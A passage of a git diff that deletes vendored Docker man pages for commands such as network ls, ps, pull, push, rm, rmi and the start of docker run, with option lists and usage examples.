-06e7eef0a170        foobar              bridge
-```
-
-You can also filter for a substring in a name as this shows:
-
-```bash
-$ docker network ls --filter name=foo
-NETWORK ID          NAME                DRIVER
-95e74588f40d        foo                 bridge
-06e7eef0a170        foobar              bridge
-```
-
-#### Type
-
-The `type` filter supports two values; `builtin` displays predefined networks
-(`bridge`, `none`, `host`), whereas `custom` displays user defined networks.
-
-The following filter matches all user defined networks:
-
-```bash
-$ docker network ls --filter type=custom
-NETWORK ID          NAME                DRIVER
-95e74588f40d        foo                 bridge
-63d1ff1f77b0        dev                 bridge
-```
-
-By having this flag it allows for batch cleanup. For example, use this filter
-to delete all user defined networks:
-
-```bash
-$ docker network rm `docker network ls --filter type=custom -q`
-```
-
-A warning will be issued when trying to remove a network that has containers
-attached.
-
-# OPTIONS
-
-**-f**, **--filter**=*[]*
-  filter output based on conditions provided. 
-
-**--format**="*TEMPLATE*"
-  Pretty-print networks using a Go template.
-  Valid placeholders:
-     .ID - Network ID
-     .Name - Network name
-     .Driver - Network driver
-     .Scope - Network scope (local, global)
-     .IPv6 - Whether IPv6 is enabled on the network or not
-     .Internal - Whether the network is internal or not
-     .Labels - All labels assigned to the network
-     .Label - Value of a specific label for this network. For example `{{.Label "project.version"}}`
-
-**--no-trunc**=*true*|*false*
-  Do not truncate the output
-
-**-q**, **--quiet**=*true*|*false*
-  Only display network IDs
-
-**--help**
-  Print usage statement
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md
deleted file mode 100644
index c094a15286..0000000000
--- a/vendor/github.com/docker/docker/man/docker-network-rm.1.md
+++ /dev/null
@@ -1,43 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCT 2015
-# NAME
-docker-network-rm - remove one or more networks
-
-# SYNOPSIS
-**docker network rm** 
-[**--help**]
-NETWORK [NETWORK...]
-
-# DESCRIPTION
-
-Removes one or more networks by name or identifier. To remove a network,
-you must first disconnect any containers connected to it.
-To remove the network named 'my-network':
-
-```bash
-  $ docker network rm my-network
-```
-
-To delete multiple networks in a single `docker network rm` command, provide
-multiple network names or ids. The following example deletes a network with id
-`3695c422697f` and a network named `my-network`:
-
-```bash
-  $ docker network rm 3695c422697f my-network
-```
-
-When you specify multiple networks, the command attempts to delete each in turn.
-If the deletion of one network fails, the command continues to the next on the
-list and tries to delete that. The command reports success or failure for each
-deletion.
-
-# OPTIONS
-**NETWORK**
-  Specify network name or id
-
-**--help**
-  Print usage statement
-
-# HISTORY
-OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md
deleted file mode 100644
index 11eef5321f..0000000000
--- a/vendor/github.com/docker/docker/man/docker-pause.1.md
+++ /dev/null
@@ -1,32 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-pause - Pause all processes within one or more containers
-
-# SYNOPSIS
-**docker pause**
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-The `docker pause` command suspends all processes in the specified containers.
-On Linux, this uses the cgroups freezer. Traditionally, when suspending a process
-the `SIGSTOP` signal is used, which is observable by the process being suspended.
-With the cgroups freezer the process is unaware, and unable to capture,
-that it is being suspended, and subsequently resumed. On Windows, only Hyper-V
-containers can be paused.
-
-See the [cgroups freezer documentation]
-(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for
-further details.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# See also
-**docker-unpause(1)** to unpause all processes within one or more containers.
-
-# HISTORY
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md
deleted file mode 100644
index 83e9cf93b6..0000000000
--- a/vendor/github.com/docker/docker/man/docker-port.1.md
+++ /dev/null
@@ -1,47 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT
-
-# SYNOPSIS
-**docker port**
-[**--help**]
-CONTAINER [PRIVATE_PORT[/PROTO]]
-
-# DESCRIPTION
-List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-    # docker ps
-    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                                            NAMES
-    b650456536c7        busybox:latest      top                 54 minutes ago      Up 54 minutes       0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp   test
-
-## Find out all the ports mapped
-
-    # docker port test
-    7890/tcp -> 0.0.0.0:4321
-    9876/tcp -> 0.0.0.0:1234
-
-## Find out a specific mapping
-
-    # docker port test 7890/tcp
-    0.0.0.0:4321
-
-    # docker port test 7890
-    0.0.0.0:4321
-
-## An example showing error for non-existent mapping
-
-    # docker port test 7890/udp
-    2014/06/24 11:53:36 Error: No public port '7890/udp' published for test
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md
deleted file mode 100644
index d9aa39f8fd..0000000000
--- a/vendor/github.com/docker/docker/man/docker-ps.1.md
+++ /dev/null
@@ -1,145 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% FEBRUARY 2015
-# NAME
-docker-ps - List containers
-
-# SYNOPSIS
-**docker ps**
-[**-a**|**--all**]
-[**-f**|**--filter**[=*[]*]]
-[**--format**=*"TEMPLATE"*]
-[**--help**]
-[**-l**|**--latest**]
-[**-n**[=*-1*]]
-[**--no-trunc**]
-[**-q**|**--quiet**]
-[**-s**|**--size**]
-
-# DESCRIPTION
-
-List the containers in the local repository. By default this shows only
-the running containers.
-
-# OPTIONS
-**-a**, **--all**=*true*|*false*
-   Show all containers. Only running containers are shown by default. The default is *false*.
-
-**-f**, **--filter**=[]
-   Filter output based on these conditions:
-   - exited=<int> an exit code of <int>
-   - label=<key> or label=<key>=<value>
-   - status=(created|restarting|running|paused|exited|dead)
-   - name=<string> a container's name
-   - id=<ID> a container's ID
-   - is-task=(true|false) - containers that are a task (part of a service managed by swarm)
-   - before=(<container-name>|<container-id>)
-   - since=(<container-name>|<container-id>)
-   - ancestor=(<image-name>[:tag]|<image-id>|<image@digest>) - containers created from an image or a descendant.
-   - volume=(<volume-name>|<mount-point-destination>)
-   - network=(<network-name>|<network-id>) - containers connected to the provided network
-   - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status
-
-**--format**="*TEMPLATE*"
-   Pretty-print containers using a Go template.
-   Valid placeholders:
-      .ID - Container ID
-      .Image - Image ID
-      .Command - Quoted command
-      .CreatedAt - Time when the container was created.
-      .RunningFor - Elapsed time since the container was started.
-      .Ports - Exposed ports.
-      .Status - Container status.
-      .Size - Container disk size.
-      .Names - Container names.
-      .Labels - All labels assigned to the container.
-      .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}`
-      .Mounts - Names of the volumes mounted in this container.
-
-**--help**
-  Print usage statement
-
-**-l**, **--latest**=*true*|*false*
-   Show only the latest created container (includes all states). The default is *false*.
-
-**-n**=*-1*
-   Show n last created containers (includes all states).
-
-**--no-trunc**=*true*|*false*
-   Don't truncate output. The default is *false*.
-
-**-q**, **--quiet**=*true*|*false*
-   Only display numeric IDs. The default is *false*.
-
-**-s**, **--size**=*true*|*false*
-   Display total file sizes. The default is *false*.
-
-# EXAMPLES
-# Display all containers, including non-running
-
-    # docker ps -a
-    CONTAINER ID        IMAGE                 COMMAND                CREATED             STATUS      PORTS    NAMES
-    a87ecb4f327c        fedora:20             /bin/sh -c #(nop) MA   20 minutes ago      Exit 0               desperate_brattain
-    01946d9d34d8        vpavlin/rhel7:latest  /bin/sh -c #(nop) MA   33 minutes ago      Exit 0               thirsty_bell
-    c1d3b0166030        acffc0358b9e          /bin/sh -c yum -y up   2 weeks ago         Exit 1               determined_torvalds
-    41d50ecd2f57        fedora:20             /bin/sh -c #(nop) MA   2 weeks ago         Exit 0               drunk_pike
-
-# Display only IDs of all containers, including non-running
-
-    # docker ps -a -q
-    a87ecb4f327c
-    01946d9d34d8
-    c1d3b0166030
-    41d50ecd2f57
-
-# Display only IDs of all containers that have the name `determined_torvalds`
-
-    # docker ps -a -q --filter=name=determined_torvalds
-    c1d3b0166030
-
-# Display containers with their commands
-
-    # docker ps --format "{{.ID}}: {{.Command}}"
-    a87ecb4f327c: /bin/sh -c #(nop) MA
-    01946d9d34d8: /bin/sh -c #(nop) MA
-    c1d3b0166030: /bin/sh -c yum -y up
-    41d50ecd2f57: /bin/sh -c #(nop) MA
-
-# Display containers with their labels in a table
-
-    # docker ps --format "table {{.ID}}\t{{.Labels}}"
-    CONTAINER ID        LABELS
-    a87ecb4f327c        com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd
-    01946d9d34d8
-    c1d3b0166030        com.docker.swarm.node=debian,com.docker.swarm.cpu=6
-    41d50ecd2f57        com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd
-
-# Display containers with their node label in a table
-
-    # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}'
-    CONTAINER ID        NODE
-    a87ecb4f327c        ubuntu
-    01946d9d34d8
-    c1d3b0166030        debian
-    41d50ecd2f57        fedora
-
-# Display containers with `remote-volume` mounted
-
-    $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}"
-    CONTAINER ID        MOUNTS
-    9c3527ed70ce        remote-volume
-
-# Display containers with a volume mounted in `/data`
-
-    $ docker ps --filter volume=/data --format "table {{.ID}}\t{{.Mounts}}"
-    CONTAINER ID        MOUNTS
-    9c3527ed70ce        remote-volume
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-February 2015, updated by André Martins <martins@noironetworks.com>
-October 2016, updated by Josh Horwitz <horwitzja@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md
deleted file mode 100644
index c61d005308..0000000000
--- a/vendor/github.com/docker/docker/man/docker-pull.1.md
+++ /dev/null
@@ -1,220 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-pull - Pull an image or a repository from a registry
-
-# SYNOPSIS
-**docker pull**
-[**-a**|**--all-tags**]
-[**--help**] 
-NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG]
-
-# DESCRIPTION
-
-This command pulls down an image or a repository from a registry. If
-there is more than one image for a repository (e.g., fedora) then all
-images for that repository name can be pulled down including any tags
-(see the option **-a** or **--all-tags**).
-
-If you do not specify a `REGISTRY_HOST`, the command uses Docker's public
-registry located at `registry-1.docker.io` by default. 
-
-# OPTIONS
-**-a**, **--all-tags**=*true*|*false*
-   Download all tagged images in the repository. The default is *false*.
-
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-### Pull an image from Docker Hub
-
-To download a particular image, or set of images (i.e., a repository), use
-`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a
-default. This command pulls the `debian:latest` image:
-
-    $ docker pull debian
-
-    Using default tag: latest
-    latest: Pulling from library/debian
-    fdd5d7827f33: Pull complete
-    a3ed95caeb02: Pull complete
-    Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa
-    Status: Downloaded newer image for debian:latest
-
-Docker images can consist of multiple layers. In the example above, the image
-consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`.
-
-Layers can be reused by images. For example, the `debian:jessie` image shares
-both layers with `debian:latest`. Pulling the `debian:jessie` image therefore
-only pulls its metadata, but not its layers, because all layers are already
-present locally:
-
-    $ docker pull debian:jessie
-
-    jessie: Pulling from library/debian
-    fdd5d7827f33: Already exists
-    a3ed95caeb02: Already exists
-    Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e
-    Status: Downloaded newer image for debian:jessie
-
-To see which images are present locally, use the **docker-images(1)**
-command:
-
-    $ docker images
-
-    REPOSITORY   TAG      IMAGE ID        CREATED      SIZE
-    debian       jessie   f50f9524513f    5 days ago   125.1 MB
-    debian       latest   f50f9524513f    5 days ago   125.1 MB
-
-Docker uses a content-addressable image store, and the image ID is a SHA256
-digest covering the image's configuration and layers. In the example above,
-`debian:jessie` and `debian:latest` have the same image ID because they are
-actually the *same* image tagged with different names. Because they are the
-same image, their layers are stored only once and do not consume extra disk
-space.
-
-For more information about images, layers, and the content-addressable store,
-refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/)
-in the online documentation.
-
-
-## Pull an image by digest (immutable identifier)
-
-So far, you've pulled images by their name (and "tag"). Using names and tags is
-a convenient way to work with images. When using tags, you can `docker pull` an
-image again to make sure you have the most up-to-date version of that image.
-For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu
-14.04 image.
-
-In some cases you don't want images to be updated to newer versions, but prefer
-to use a fixed version of an image. Docker enables you to pull an image by its
-*digest*. When pulling an image by digest, you specify *exactly* which version
-of an image to pull. Doing so, allows you to "pin" an image to that version,
-and guarantee that the image you're using is always the same.
-
-To know the digest of an image, pull the image first. Let's pull the latest
-`ubuntu:14.04` image from Docker Hub:
-
-    $ docker pull ubuntu:14.04
-
-    14.04: Pulling from library/ubuntu
-    5a132a7e7af1: Pull complete
-    fd2731e4c50c: Pull complete
-    28a2f68d1120: Pull complete
-    a3ed95caeb02: Pull complete
-    Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-    Status: Downloaded newer image for ubuntu:14.04
-
-Docker prints the digest of the image after the pull has finished. In the example
-above, the digest of the image is:
-
-    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-
-Docker also prints the digest of an image when *pushing* to a registry. This
-may be useful if you want to pin to a version of the image you just pushed.
-
-A digest takes the place of the tag when pulling an image, for example, to 
-pull the above image by digest, run the following command:
-
-    $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-
-    sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu
-    5a132a7e7af1: Already exists
-    fd2731e4c50c: Already exists
-    28a2f68d1120: Already exists
-    a3ed95caeb02: Already exists
-    Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-    Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-
-Digest can also be used in the `FROM` of a Dockerfile, for example:
-
-    FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2
-    MAINTAINER some maintainer <maintainer@example.com>
-
-> **Note**: Using this feature "pins" an image to a specific version in time.
-> Docker will therefore not pull updated versions of an image, which may include 
-> security updates. If you want to pull an updated image, you need to change the
-> digest accordingly.
-
-## Pulling from a different registry
-
-By default, `docker pull` pulls images from Docker Hub. It is also possible to
-manually specify the path of a registry to pull from. For example, if you have
-set up a local registry, you can specify its path to pull from it. A registry
-path is similar to a URL, but does not contain a protocol specifier (`https://`).
-
-The following command pulls the `testing/test-image` image from a local registry
-listening on port 5000 (`myregistry.local:5000`):
-
-    $ docker pull myregistry.local:5000/testing/test-image
-
-Registry credentials are managed by **docker-login(1)**.
-
-Docker uses the `https://` protocol to communicate with a registry, unless the
-registry is allowed to be accessed over an insecure connection. Refer to the
-[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries)
-section in the online documentation for more information.
-
-
-## Pull a repository with multiple images
-
-By default, `docker pull` pulls a *single* image from the registry. A repository
-can contain multiple images. To pull all images from a repository, provide the
-`-a` (or `--all-tags`) option when using `docker pull`.
-
-This command pulls all images from the `fedora` repository:
-
-    $ docker pull --all-tags fedora
-
-    Pulling repository fedora
-    ad57ef8d78d7: Download complete
-    105182bb5e8b: Download complete
-    511136ea3c5a: Download complete
-    73bd853d2ea5: Download complete
-    ....
-
-    Status: Downloaded newer image for fedora
-
-After the pull has completed use the `docker images` command to see the
-images that were pulled. The example below shows all the `fedora` images
-that are present locally:
-
-    $ docker images fedora
-
-    REPOSITORY   TAG         IMAGE ID        CREATED      SIZE
-    fedora       rawhide     ad57ef8d78d7    5 days ago   359.3 MB
-    fedora       20          105182bb5e8b    5 days ago   372.7 MB
-    fedora       heisenbug   105182bb5e8b    5 days ago   372.7 MB
-    fedora       latest      105182bb5e8b    5 days ago   372.7 MB
-
-
-## Canceling a pull
-
-Killing the `docker pull` process, for example by pressing `CTRL-c` while it is
-running in a terminal, will terminate the pull operation.
-
-    $ docker pull fedora
-
-    Using default tag: latest
-    latest: Pulling from library/fedora
-    a3ed95caeb02: Pulling fs layer
-    236608c7b546: Pulling fs layer
-    ^C
-
-> **Note**: Technically, the Engine terminates a pull operation when the
-> connection between the Docker Engine daemon and the Docker Engine client
-> initiating the pull is lost. If the connection with the Engine daemon is
-> lost for other reasons than a manual interaction, the pull is also aborted.
-
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by John Willis <john.willis@docker.com>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
-September 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md
deleted file mode 100644
index 847e66d2e4..0000000000
--- a/vendor/github.com/docker/docker/man/docker-push.1.md
+++ /dev/null
@@ -1,63 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-push - Push an image or a repository to a registry
-
-# SYNOPSIS
-**docker push**
-[**--help**]
-NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG]
-
-# DESCRIPTION
-
-Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com)
-registry or to a self-hosted one.
-
-Refer to **docker-tag(1)** for more information about valid image and tag names.
-
-Killing the **docker push** process, for example by pressing **CTRL-c** while it
-is running in a terminal, terminates the push operation.
-
-Registry credentials are managed by **docker-login(1)**.
-
-
-# OPTIONS
-
-**--disable-content-trust**
-  Skip image verification (default true)
-
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-## Pushing a new image to a registry
-
-First save the new image by finding the container ID (using **docker ps**)
-and then committing it to a new image name.  Note that only a-z0-9-_. are
-allowed when naming images:
-
-    # docker commit c16378f943fe rhel-httpd
-
-Now, push the image to the registry using the image ID. In this example the
-registry is on host named `registry-host` and listening on port `5000`. To do
-this, tag the image with the host name or IP address, and the port of the
-registry:
-
-    # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd
-    # docker push registry-host:5000/myadmin/rhel-httpd
-
-Check that this worked by running:
-
-    # docker images
-
-You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd`
-listed.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
-June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md
deleted file mode 100644
index eaeea5c6e0..0000000000
--- a/vendor/github.com/docker/docker/man/docker-rename.1.md
+++ /dev/null
@@ -1,15 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% OCTOBER 2014
-# NAME
-docker-rename - Rename a container
-
-# SYNOPSIS
-**docker rename**
-CONTAINER NEW_NAME
-
-# OPTIONS
-There are no available options.
-
-# DESCRIPTION
-Rename a container.  Container may be running, paused or stopped.
diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md
deleted file mode 100644
index 271c4eee1b..0000000000
--- a/vendor/github.com/docker/docker/man/docker-restart.1.md
+++ /dev/null
@@ -1,26 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-restart - Restart one or more containers
-
-# SYNOPSIS
-**docker restart**
-[**--help**]
-[**-t**|**--time**[=*10*]]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-Restart each container listed.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-t**, **--time**=*10*
-   Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md
deleted file mode 100644
index 2105288d0d..0000000000
--- a/vendor/github.com/docker/docker/man/docker-rm.1.md
+++ /dev/null
@@ -1,72 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-rm - Remove one or more containers
-
-# SYNOPSIS
-**docker rm**
-[**-f**|**--force**]
-[**-l**|**--link**]
-[**-v**|**--volumes**]
-CONTAINER [CONTAINER...]
-
-# DESCRIPTION
-
-**docker rm** will remove one or more containers from the host node. The
-container name or ID can be used. This does not remove images. You cannot
-remove a running container unless you use the **-f** option. To see all
-containers on a host use the **docker ps -a** command.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-f**, **--force**=*true*|*false*
-   Force the removal of a running container (uses SIGKILL). The default is *false*.
-
-**-l**, **--link**=*true*|*false*
-   Remove the specified link and not the underlying container. The default is *false*.
-
-**-v**, **--volumes**=*true*|*false*
-   Remove the volumes associated with the container. The default is *false*.
-
-# EXAMPLES
-
-## Removing a container using its ID
-
-To remove a container using its ID, find either from a **docker ps -a**
-command, or use the ID returned from the **docker run** command, or retrieve
-it from a file used to store it using the **docker run --cidfile**:
-
-    docker rm abebf7571666
-
-## Removing a container using the container name
-
-The name of the container can be found using the **docker ps -a**
-command. The use that name as follows:
-
-    docker rm hopeful_morse
-
-## Removing a container and all associated volumes
-
-    $ docker rm -v redis
-    redis
-
-This command will remove the container and any volumes associated with it.
-Note that if a volume was specified with a name, it will not be removed.
-
-    $ docker create -v awesome:/foo -v /bar --name hello redis
-    hello
-    $ docker rm -v hello
-
-In this example, the volume for `/foo` will remain in tact, but the volume for
-`/bar` will be removed. The same behavior holds for volumes inherited with
-`--volumes-from`.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md
deleted file mode 100644
index 35bf8aac6a..0000000000
--- a/vendor/github.com/docker/docker/man/docker-rmi.1.md
+++ /dev/null
@@ -1,42 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-rmi - Remove one or more images
-
-# SYNOPSIS
-**docker rmi**
-[**-f**|**--force**]
-[**--help**]
-[**--no-prune**]
-IMAGE [IMAGE...]
-
-# DESCRIPTION
-
-Removes one or more images from the host node. This does not remove images from
-a registry. You cannot remove an image of a running container unless you use the
-**-f** option. To see all images on a host use the **docker images** command.
-
-# OPTIONS
-**-f**, **--force**=*true*|*false*
-   Force removal of the image. The default is *false*.
-
-**--help**
-  Print usage statement
-
-**--no-prune**=*true*|*false*
-   Do not delete untagged parents. The default is *false*.
-
-# EXAMPLES
-
-## Removing an image
-
-Here is an example of removing an image:
-
-    docker rmi fedora/httpd
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-April 2015, updated by Mary Anthony for v2 <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md
deleted file mode 100644
index 8c1018a1e2..0000000000
--- a/vendor/github.com/docker/docker/man/docker-run.1.md
+++ /dev/null
@@ -1,1055 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-run - Run a command in a new container
-
-# SYNOPSIS
-**docker run**
-[**-a**|**--attach**[=*[]*]]
-[**--add-host**[=*[]*]]
-[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
-[**--blkio-weight-device**[=*[]*]]
-[**--cpu-shares**[=*0*]]
-[**--cap-add**[=*[]*]]
-[**--cap-drop**[=*[]*]]
-[**--cgroup-parent**[=*CGROUP-PATH*]]
-[**--cidfile**[=*CIDFILE*]]
-[**--cpu-count**[=*0*]]
-[**--cpu-percent**[=*0*]]
-[**--cpu-period**[=*0*]]
-[**--cpu-quota**[=*0*]]
-[**--cpu-rt-period**[=*0*]]
-[**--cpu-rt-runtime**[=*0*]]
-[**--cpus**[=*0.0*]]
-[**--cpuset-cpus**[=*CPUSET-CPUS*]]
-[**--cpuset-mems**[=*CPUSET-MEMS*]]
-[**-d**|**--detach**]
-[**--detach-keys**[=*[]*]]
-[**--device**[=*[]*]]
-[**--device-read-bps**[=*[]*]]
-[**--device-read-iops**[=*[]*]]
-[**--device-write-bps**[=*[]*]]
-[**--device-write-iops**[=*[]*]]
-[**--dns**[=*[]*]]
-[**--dns-option**[=*[]*]]
-[**--dns-search**[=*[]*]]
-[**-e**|**--env**[=*[]*]]
-[**--entrypoint**[=*ENTRYPOINT*]]
-[**--env-file**[=*[]*]]
-[**--expose**[=*[]*]]
-[**--group-add**[=*[]*]]
-[**-h**|**--hostname**[=*HOSTNAME*]]
-[**--help**]
-[**--init**]
-[**--init-path**[=*[]*]]
-[**-i**|**--interactive**]
-[**--ip**[=*IPv4-ADDRESS*]]
-[**--ip6**[=*IPv6-ADDRESS*]]
-[**--ipc**[=*IPC*]]
-[**--isolation**[=*default*]]
-[**--kernel-memory**[=*KERNEL-MEMORY*]]
-[**-l**|**--label**[=*[]*]]
-[**--label-file**[=*[]*]]
-[**--link**[=*[]*]]
-[**--link-local-ip**[=*[]*]]
-[**--log-driver**[=*[]*]]
-[**--log-opt**[=*[]*]]
-[**-m**|**--memory**[=*MEMORY*]]
-[**--mac-address**[=*MAC-ADDRESS*]]
-[**--memory-reservation**[=*MEMORY-RESERVATION*]]
-[**--memory-swap**[=*LIMIT*]]
-[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]]
-[**--name**[=*NAME*]]
-[**--network-alias**[=*[]*]]
-[**--network**[=*"bridge"*]]
-[**--oom-kill-disable**]
-[**--oom-score-adj**[=*0*]]
-[**-P**|**--publish-all**]
-[**-p**|**--publish**[=*[]*]]
-[**--pid**[=*[PID]*]]
-[**--userns**[=*[]*]]
-[**--pids-limit**[=*PIDS_LIMIT*]]
-[**--privileged**]
-[**--read-only**]
-[**--restart**[=*RESTART*]]
-[**--rm**]
-[**--security-opt**[=*[]*]]
-[**--storage-opt**[=*[]*]]
-[**--stop-signal**[=*SIGNAL*]]
-[**--stop-timeout**[=*TIMEOUT*]]
-[**--shm-size**[=*[]*]]
-[**--sig-proxy**[=*true*]]
-[**--sysctl**[=*[]*]]
-[**-t**|**--tty**]
-[**--tmpfs**[=*[CONTAINER-DIR[:<OPTIONS>]*]]
-[**-u**|**--user**[=*USER*]]
-[**--ulimit**[=*[]*]]
-[**--uts**[=*[]*]]
-[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]]
-[**--volume-driver**[=*DRIVER*]]
-[**--volumes-from**[=*[]*]]
-[**-w**|**--workdir**[=*WORKDIR*]]
-IMAGE [COMMAND] [ARG...]
-
-# DESCRIPTION
-
-Run a process in a new container. **docker run** starts a process with its own
-file system, its own networking, and its own isolated process tree. The IMAGE
-which starts the process may define defaults related to the process that will be
-run in the container, the networking to expose, and more, but **docker run**
-gives final control to the operator or administrator who starts the container
-from the image. For that reason **docker run** has more options than any other
-Docker command.
-
-If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and
-all image dependencies, from the repository in the same way running **docker
-pull** IMAGE, before it starts the container from that image.
-
-# OPTIONS
-**-a**, **--attach**=[]
-   Attach to STDIN, STDOUT or STDERR.
-
-   In foreground mode (the default when **-d**
-is not specified), **docker run** can start the process in the container
-and attach the console to the process's standard input, output, and standard
-error. It can even pretend to be a TTY (this is what most commandline
-executables expect) and pass along signals. The **-a** option can be set for
-each of stdin, stdout, and stderr.
-
-**--add-host**=[]
